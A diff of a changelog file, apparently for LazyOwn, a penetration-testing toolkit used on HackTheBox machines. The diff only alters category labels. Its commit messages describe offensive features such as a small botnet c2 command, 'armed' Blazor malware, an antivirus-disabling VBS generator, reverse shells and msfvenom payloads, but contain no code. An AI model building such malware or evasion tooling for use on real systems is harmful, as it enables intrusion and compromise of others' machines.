@@ -6888,8 +6914,8 @@
Otros
Hora: 1725687669
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): testing new feature tord Version: release/0.1.38
@@ -6901,8 +6927,8 @@
Otros
Hora: 1725607743
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): ivy shellcodes test Version: release/0.1.38 new command
@@ -6915,7 +6941,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): new alias Version: release/0.1.38 new alias tor
@@ -6928,7 +6954,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): corrections in text Version: release/0.1.38 and some
@@ -6940,7 +6966,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): new links Version: release/0.1.38 automatic download
@@ -6953,7 +6979,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): better docs Version: release/0.1.38 is zen now :)
@@ -6966,7 +6992,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(fet): msfpc Version: release/0.1.38 automation Modified
@@ -6978,8 +7004,8 @@
Otros
Hora: 1725340514
-Otros
Otros
+Otros
- feature(feat): comandos nuevos documentados en commands.md Version:
@@ -6991,8 +7017,8 @@
Otros
Hora: 1725334465
-Otros
Otros
+Otros
- feature(feat): new command apache_users & new options -p to use
@@ -7009,7 +7035,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): documented malwarebazar Version: release/0.1.35 Fetches
@@ -7023,7 +7049,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): documentating Version: release/0.1.35 functions dacledit
@@ -7035,8 +7061,8 @@
Otros
Hora: 1725164019
-Otros
Otros
+Otros
- feature(feat): Nuevos comandos documentados en COMMANDS.md Version:
@@ -7055,8 +7081,8 @@
Otros
Hora: 1725099704
-Otros
Otros
+Otros
- feature(feat): nuevos comandos documetados en COMMANDS.md Version:
@@ -7070,8 +7096,8 @@
Otros
Hora: 1725075210
-Otros
Otros
+Otros
- feature(feat): nuevos comandos documentados en COMMANDS.md Version:
@@ -7085,7 +7111,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(hotfix): deleted the insecure chat Version: release/0.1.32
@@ -7097,8 +7123,8 @@
Otros
Hora: 1725001084
-Otros
Otros
+Otros
- feature(feat): Nuevos comandos documentados en COMMANDS.md Version:
@@ -7112,8 +7138,8 @@
Otros
Hora: 1724900538
-Otros
Otros
+Otros
- feature(feat): Nuevos comandos documentados en COMMANDS.md Version:
@@ -7128,7 +7154,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): some fixes in c2 Version: release/0.1.29 now curl attack
@@ -7140,7 +7166,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(kick): to kick from net some ip Version: release/0.1.28 seend
@@ -7153,8 +7179,8 @@
Otros
Hora: 1724734432
-Otros
Otros
+Otros
- feature(new command c2 documentad at COMMANDS.md): a little botnet
@@ -7168,7 +7194,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix auto exploit cacti rce logged): now the attack work
@@ -7180,8 +7206,8 @@
Otros
Hora: 1724653124
-Otros
Otros
+Otros
- feature(new commands docummented at COMMANDS.md): waybackmachine,
@@ -7195,8 +7221,8 @@
Otros
Hora: 1724556511
-Otros
Otros
+Otros
- feature(2 new attacks): docummented at COMMANDS.md Version:
@@ -7208,8 +7234,8 @@
Otros
Hora: 1724527338
-Pruebas
-Otros
+Pruebas
+Otros
- test(new machine): monitorsthree.htb Version: release/0.1.23
@@ -7221,7 +7247,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(new payload): in msfvenom Version: release/0.1.23 :) java
@@ -7233,7 +7259,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(new feature): padbuster Version: release/0.1.23 new command
@@ -7246,7 +7272,7 @@
Otros
Documentación
-Otros
+Otros
- docs(documentacion): nueva versiòn en la web reflejada en el banner
@@ -7258,7 +7284,7 @@
Otros
Documentación
-Otros
+Otros
- docs(new documentation): better documentation to commands and utils
@@ -7271,7 +7297,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(new feat in createdll): new option 3 to run automate create dll
@@ -7285,7 +7311,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): blazormalware corrected now functional and armed :)
@@ -7299,7 +7325,7 @@
Otros
Documentación
-Otros
+Otros
- docs(Lang): Translate README.md to English, enhancing clarity and
@@ -7319,7 +7345,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(malware new): blazor malware Version: release/0.1.20 create
@@ -7332,7 +7358,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): se agrega la libreria colors en modules para
@@ -7347,8 +7373,8 @@
Otros
Hora: 1724134817
-Otros
Otros
+Otros
- feature(feat): dos comandos nuevos, skipfish y createdll, nuevo
@@ -7362,7 +7388,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): create new command shellcode, run lazymsfvenom modified
@@ -7376,7 +7402,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(new feat): new funcionality in proxy command, hexdump on
@@ -7390,7 +7416,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): new prompt Version: release/0.1.16 now show the url of
@@ -7402,7 +7428,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(feat): new command set_proxychains Version: release/0.1.15
@@ -7415,7 +7441,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(bug fixing): bug fixing in vars of DEPLOY.sh Version:
@@ -7426,8 +7452,8 @@
Otros
2024 -0400 Hora: 1724013443
-Otros
Otros
+Otros
- feature(new payload in msfvenom android): new options in msf rev
@@ -7440,7 +7466,7 @@
Otros
Documentación
-Otros
+Otros
- docs(documented): agradecimientos Version: release/0.1.12 a ✌ el
@@ -7452,7 +7478,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(implement sicat libs): to ss command Version: release/0.1.12
@@ -7467,7 +7493,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(some fixes): html and new patreon :) Version: release/0.1.11 :)
@@ -7478,8 +7504,8 @@
Otros
Hora: 1723859535
-Otros
Otros
+Otros
- feature(new tools): new commands, new payloads in find, new cves,
@@ -7494,7 +7520,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(new feature): new command finalrecon docuemnted at COMMANDS.md
@@ -7508,7 +7534,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(command): new commando swaks to abuse of smtp Version:
@@ -7521,7 +7547,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix in vpn): new machine Version: release/0.1.7 chenges in
@@ -7532,8 +7558,8 @@
Otros
Hora: 1723780696
-Pruebas
-Otros
+Pruebas
+Otros
- test(deleted files): index.sh y dump_readme.sh Version:
@@ -7546,7 +7572,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor DEPLOY, sessionstrace): se crea todo en un solo
@@ -7561,8 +7587,8 @@
Otros
Hora: 1723767303
-Otros
Otros
+Otros
- feature(sessionssh y sessionsshstrace): nuevos comandos documentados
@@ -7575,8 +7601,8 @@
Otros
Hora: 1723763173
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing Changelog): new method to create changelog Version:
@@ -7588,7 +7614,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(lazyscripts): se crea el comando y el directorio lazyscripts el
@@ -7601,8 +7627,8 @@
Otros
Hora: 1723760162
-Otros
Otros
+Otros
- feature(nuevos recursos, comandos, archivos tool para pwntomate): se
@@ -7620,7 +7646,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(tool): nuevo tool a pwntomate medusa.tool Version:
@@ -7632,7 +7658,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(medusa): nueco comando Version: release/0.1.2 para crackear
@@ -7644,7 +7670,7 @@
Otros
Documentación
-Otros
+Otros
- docs(changelog): reload Version: release/0.1.1 deleted -
@@ -7656,7 +7682,7 @@
Otros
Documentación
-Otros
+Otros
- docs(history): reload the history deleted by error holly git :P
@@ -7668,7 +7694,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): fix Version: release/0.1.1 fix - DEPLOY.sh - README.md -
@@ -7679,7 +7705,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): versionamiento Version: - DEPLOY.sh - README.md -
@@ -7690,7 +7716,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): fix en los tags Version: - README.md - docs/README.html -
@@ -7701,7 +7727,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(version file): Version: - README.md - docs/README.html -
@@ -7712,7 +7738,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(pandoc): command Version: bad arguments - DEPLOY.sh - README.md
@@ -7723,7 +7749,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fix): changelog Version: :D - DEPLOY.sh - README.md -
@@ -7734,7 +7760,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fixing): fixin bug in formating of changelog Version: :D -
@@ -7745,7 +7771,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(fixing): fixing semantic version Version: implemented -
@@ -7757,7 +7783,7 @@
Otros
Nuevo Release
-Otros
+Otros
- release(release): tipo release Version: probandoe l tipo release -
@@ -7768,7 +7794,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(error en parametro): deploy en el pandocpara generar
@@ -7780,7 +7806,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(cambio en el versionamiento semantico): se agregan release y
@@ -7793,7 +7819,7 @@
Otros
Nuevo parche
-Otros
+Otros
- patch(patching): prueba de nuevos tipos de commits Version: en este
@@ -7803,8 +7829,8 @@
Otros
Hora: 1723703697
-Pruebas
-Otros
+Pruebas
+Otros
- test(testind): deploy Version: release/0.1.0 test LazyOwn on
@@ -7814,7 +7840,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(semantic versioning): se implementa el versionamiento semantico
@@ -7827,7 +7853,7 @@
Otros
Correcciones
-Otros
+Otros
- fix(firma de commits con pgp): cree una firmita gpg para firmar los
@@ -7837,8 +7863,8 @@
Otros
Hora: 1723701172
-Otros
Otros
+Otros
- feature(test): testing deploy feature and semantic versioning
@@ -7848,8 +7874,8 @@
Otros
Hora: 1723701007
-Pruebas
-Otros
+Pruebas
+Otros
- test(deploy): testing deploy script Version: release/0.0.13 testing
@@ -7860,7 +7886,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(bug in Deploy): not updated the index.html file in deploys
@@ -7871,8 +7897,8 @@
Otros
Hora: 1723699864
-Otros
Otros
+Otros
- feature(mejoras y fixes): - se agrega un pequeño diccionario en el
@@ -7886,7 +7912,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(add scripts): - adding scripts on sessions/win directory a nc
@@ -7898,7 +7924,7 @@
Otros
Documentación
-Otros
+Otros
- docs(add README.html to anchor tag in menu of index.html): - chenges
@@ -7910,7 +7936,7 @@
Otros
Documentación
-Otros
+Otros
- docs(mejora documentaciòn): se completan varios comandos con
@@ -7921,8 +7947,8 @@
Otros
Hora: 1723690831
-Otros
Otros
+Otros
- feature(cambios en script fast_run_as_r00t.sh): se agrega la opción
@@ -7935,7 +7961,7 @@
Otros
Documentación
-Otros
+Otros
- docs(test): bad tabs in index.html Version: release/0.0.13 LazyOwn
@@ -7945,7 +7971,7 @@
Otros
Documentación
-Otros
+Otros
- docs(cambio en index.html): tabulacion incorrecta del banner
@@ -7956,7 +7982,7 @@
Otros
Refactorización
-Otros
+Otros
- refactor(refactor): se cambia el nombre de readme.sh a
@@ -7967,8 +7993,8 @@
Otros
Hora: 1723671942
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): test Version: release/0.0.13 test LazyOwn on HackTheBox:
@@ -7977,8 +8003,8 @@
Otros
Hora: 1723671536
-Otros
Otros
+Otros
- feature(actualizador de readme.md): con los nuevos cambios desde los
@@ -7989,8 +8015,8 @@
Otros
Hora: 1723670843
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): new styles in html of documentation Version:
@@ -8000,8 +8026,8 @@
Otros
Hora: 1723669581
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): testing changelog Version: release/0.0.13 LazyOwn on
@@ -8010,8 +8036,8 @@
Otros
Hora: 1723669421
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): new changelog format Version: release/0.0.13 new
@@ -8021,8 +8047,8 @@
Otros
Hora: 1723668967
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): Version: release/0.0.13 test LazyOwn on HackTheBox:
@@ -8031,8 +8057,8 @@
Otros
Hora: 1723668932
-Pruebas
-Otros
+Pruebas
+Otros
- test(testeando): nuevo changelog Version: release/0.0.13 mejor
@@ -8042,8 +8068,8 @@
Otros
Hora: 1723668469
-Pruebas
-Otros
+Pruebas
+Otros
- test(test): deploy Version: release/0.0.13 changes in changelog
@@ -8052,8 +8078,8 @@
Otros
2024 -0400 Hora: 1723667712
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): changelog Version: release/0.0.13 saltos de linea
@@ -8062,8 +8088,8 @@
Otros
2024 -0400 Hora: 1723667648
-Pruebas
-Otros
+Pruebas
+Otros
- test(tesing): saltos de linea en commit Version: release/0.0.13 :)
@@ -8073,7 +8099,7 @@
Otros
Documentación
-Otros
+Otros
- docs(class=“neon-text” on ul): :): release/0.0.13:)LazyOwn on
@@ -8082,8 +8108,8 @@
Otros
Hora: 1723665459
-Pruebas
-Otros
+Pruebas
+Otros
- test(commits con fecha y hora :P): probando el despliegue:
@@ -8093,8 +8119,8 @@
Otros
Hora: 1723665132
-Pruebas
-Otros
+Pruebas
+Otros
- test(test de index.html): testeando el despliegue automatizado del
@@ -8103,8 +8129,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(test index.sh): se realizan cambios en index.sh:
@@ -8114,8 +8140,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(testing): Testeando el flujo de trabajo en los despliegues
@@ -8124,8 +8150,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(versionamiento semantico en script de deploy): mejora en
@@ -8135,8 +8161,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(test of –no-test): and lolcat on clock command :Phas now
@@ -8147,7 +8173,7 @@
Otros
Documentación
-Otros
+Otros
- docs(se agrega el change log al readme): tambien se ejecutan pruebas
@@ -8159,7 +8185,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(fix in vpn): dont work with argumentsworks xD👽 LazyOwn on
@@ -8168,8 +8194,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(parametrizar el despliegue): se agrega el parametro –no-test
@@ -8179,8 +8205,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(troubleshooting): deleting the tmp file but i cant sleep👽
@@ -8190,7 +8216,7 @@
Otros
Correcciones urgentes
-Otros
+Otros
- hotfix(delete qa command to option -c): bug: dont let beggin
@@ -8200,8 +8226,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(despliegue): backup file del archivo lazyown creado en las
@@ -8213,8 +8239,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(despliegue): de organizaciòn de archivos ovpn dentro del
@@ -8224,8 +8250,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Pruebas
-Otros
+Pruebas
+Otros
- test(testmeneitor): probando el workflow de desplieguees el body de
@@ -8235,8 +8261,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(nuevo creador de index.html): crea el html de manera
@@ -8247,8 +8273,8 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- feature(mejora CHANGELOG.sh): ahora actualiza usando
@@ -8260,7 +8286,7 @@
Otros
Nuevas características
-Otros
+Otros
- feat(mejorando el tipo): cambio en el script CHANGELOG.shmejora la
@@ -8271,7 +8297,7 @@
Otros
Documentación
-Otros
+Otros
- docs(docs): El cierre de una imagen en la documentación estaba mal
@@ -8281,22 +8307,22 @@
Otros
https://grisuno.github.io/LazyOwn/
-Otros
Otros
+Otros
- Nueva descripcion en el readme y probando el CHANGELOG.sh :)
-Otros
Otros
+Otros
- ahora el changelog a docs :D en formato html
-Otros
Otros
+Otros
- HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 Ahora
@@ -8307,8 +8333,8 @@
Otros
y CHANGELOG.sh :D 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
@@ -8316,8 +8342,8 @@
Otros
README.html madremia que comandazo 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
@@ -8325,24 +8351,24 @@
Otros
README.html madremia que comandazo 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
some changes in the web 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
comming soon tryhackme 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
@@ -8351,40 +8377,40 @@
Otros
readmeneitor.py :P 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new
fancy proompt :) 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 bug
fixing 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429
👽👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
3ast3r366 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -8392,8 +8418,8 @@
Otros
👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -8401,8 +8427,8 @@
Otros
👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -8410,31 +8436,31 @@
Otros
👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
command launchpad to recon Linux OS 👽
-Otros
Otros
+Otros
- Merge pull request #27 from grisuno/clcthulhu-patch-1
Documentación
-Otros
+Otros
- docs(update readme description): change of the description; Update
README.md
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 New
@@ -8442,40 +8468,40 @@
Otros
VERSION 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
mejorando la documentaciòn 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new
commands rulencode, urldecode, y lynis documented at COMMANDS.md 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
command vpn now handle multiple ovpn files 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽
command vpn now handle multiple ovpn files 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 👽 new
@@ -8483,24 +8509,24 @@
Otros
hashcat, more soon :) 👽
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429 new
commands documented at COMMANDS.md
-Otros
Otros
+Otros
- 👽 HackTheBox: https://app.hackthebox.com/teams/overview/6429
Magicgardens is so insane but pwned :)
-Otros
Otros
+Otros
- 👽 new commands documented in COMMANDS.md or README.md and more
@@ -8508,8 +8534,8 @@
Otros
their own repo…
-Otros
Otros
+Otros
- 👽 new commands documented in COMMANDS.md or README.md and more
@@ -8517,302 +8543,302 @@
Otros
their own repo…
-Otros
Otros
+Otros
- 👽 new machine magic gardens insane machine because resource was
pwned and sea not was released yet
-Otros
Otros
+Otros
- 👽 bug fixing in createhash, new wrappers, chisel command updated
now can choice the payload, img2cookie new payloads
-Otros
Otros
+Otros
- 👽 bug fixing in createhash, new wrappers, chisel command updated
now can choice the payload, img2cookie new payloads
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 👽 new tools for pwntomate :D
-Otros
Otros
+Otros
- 👽 new command img2cookie :)
-Otros
Otros
+Otros
- 👽 new command img2cookie :)
-Otros
Otros
+Otros
- 👽 new machine comprezzor.htb
-Otros
Otros
+Otros
- 👽 new script readmeneitor req updated
-Otros
Otros
+Otros
- 👽 new script readmeneitor to help me update the readme xD
-Otros
Otros
+Otros
- 👽 new command ssh 22 and if u have file sessions/credentials.txt
this will open ssh conection :)
-Otros
Otros
+Otros
- 👽 bug fixing and replace command nc with pwncatcs more fancy and
sharp :)
-Otros
Otros
+Otros
- 👽 bug fixing in wfuzz sub command wen you not pass the domain
-Otros
Otros
+Otros
- 👽 some changes in nmap script now discovery have template html too
and we have a little index2.html to navigate the reports.
-Otros
Otros
+Otros
- 👽 some littles changes :)
-Otros
Otros
+Otros
- 👽 new machine compiled :)
-Otros
Otros
+Otros
- 👽 new command disableav to create a aav.vbs to disable av if it’s
possible :)
-Otros
Otros
+Otros
- 👽 changing the command in venom :)
-Otros
Otros
+Otros
- 👽 holly jissus mist.htb now pwned with my user :P its rally insane
amount of work to pwn
-Otros
Otros
+Otros
- 👽 holly jissus mist.htb machine cost to me one week and my mental
health xD bu it’s pwned xD
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 👽 chisel fix copy to clipboard commad bug …
-Otros
Otros
+Otros
- 👽 command list to update the readme: todo …
-Otros
Otros
+Otros
- 👽 no more prints ( 👽 we have 13 xD) now we have technologì we have
print_msg, print_error & print_warn :) so much pretty
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- 👽 new brothers commands, LazyOwn> winbase64payload and
asprevbase64 👽
-Otros
Otros
+Otros
- some roder to prints, not finished yet but the storm its cut the
electricity so commit….
-Otros
Otros
+Otros
- feat: somo testing and alias now you can run gpt alias :D
-Otros
Otros
+Otros
- feat: Now the GPT Client use Llama 70B and now can hack :) fixing
error path from json files :P
-Otros
Otros
+Otros
- feat: Now the GPT Client use Llama 70B and now can hack :)
-Otros
Otros
+Otros
- feat: more time to the nmap to finished and pyautomate
autostart
-Otros
Otros
+Otros
- feat: New stylesheet for Nmap reports, making them more professional
@@ -8821,45 +8847,45 @@
Otros
soon
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- some new attacks exploits and new menu to download resources and
exploits :D new msf autoroute :D
-Otros
Otros
+Otros
- some new attacks exploits and new menu to download resources adn
exploits :D
-Otros
Otros
+Otros
-Otros
Otros
+Otros
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 command
@@ -8867,48 +8893,48 @@
Otros
charge an iccon from our smbserver and the hash is ours
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command getnpusers
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 the target
was pwntomated 🍅 alias auto.
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 the target
was pwntomated 🍅 alias auto.
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 the target
was pwntomated 🍅. jejejjejej
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 now with
pwntomate to automate with the command pyautomate
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 now
@@ -8916,8 +8942,8 @@
Otros
pleasssure. xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -8925,8 +8951,8 @@
Otros
command
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 socat
@@ -8935,101 +8961,101 @@
Otros
perform a malicious shortcut lnk attack with msfvenom
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some
format….
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 …
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 fix
arguments little bug
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 fix
arguments little bug
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
arguments :) -c command ex ping
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
aliases :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 now
options like –help, -v and –no-banner :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command clock to see the time of the eternal now :) now in white xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command clock to see the time of the eternal now :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429
newhashcat
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -9037,8 +9063,8 @@
Otros
better now with recognice automate download_resource
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 another
@@ -9047,40 +9073,40 @@
Otros
xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 was banned
from htb to spoiler jajjajaj xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 msf
command
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 scripts to
try attac cammeras not work with my cammera yet xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 scripts to
try attac cammeras not work with my cammera yet xD
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -9088,24 +9114,24 @@
Otros
cports
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 clean
command to clean up the mess and pwn the next machine :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 wfuzz
commands pwd, sh
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 wfuzz
@@ -9113,72 +9139,72 @@
Otros
vpn, rev, banner :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New Colors
:D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 adding run
script to run lazyown with virtual env activated to avoid errors
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 adding
alias to exit as q :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 adding
alias to commands its una shulada
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some love
to list command :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some love
in form of colored strings :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 some love
to some prints :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
command py3ttyup to upgrade to tty your rev shell :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -9187,8 +9213,8 @@
Otros
fixperms :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
@@ -9196,120 +9222,120 @@
Otros
where lazyown dump scripts like revertshells, webshells, etc.
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 solarlab
pwned :D new machine MagicGardens
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine solarlab :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
revshell.c and machine powned xD axlle hard
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
commands createrevshell y createwinrevshell
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 FormulaX
pwned :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Freelancer Pwned :P new new new FormulaX :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Freelancer :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Skyfall Linux insane machine, Blazorized was powned :D
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Blazorized.htb
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Greenhorn.htb pwned
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
machine Greenhorn.htb
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new tool
in external :) https://github.com/BloodHoundAD/SharpHound.git :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
MAchine Blazorized.htb :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 new
MAchine :)
-Otros
Otros
+Otros
- HackTheBox https://app.hackthebox.com/teams/overview/6429 New
@@ -9317,24 +9343,24 @@
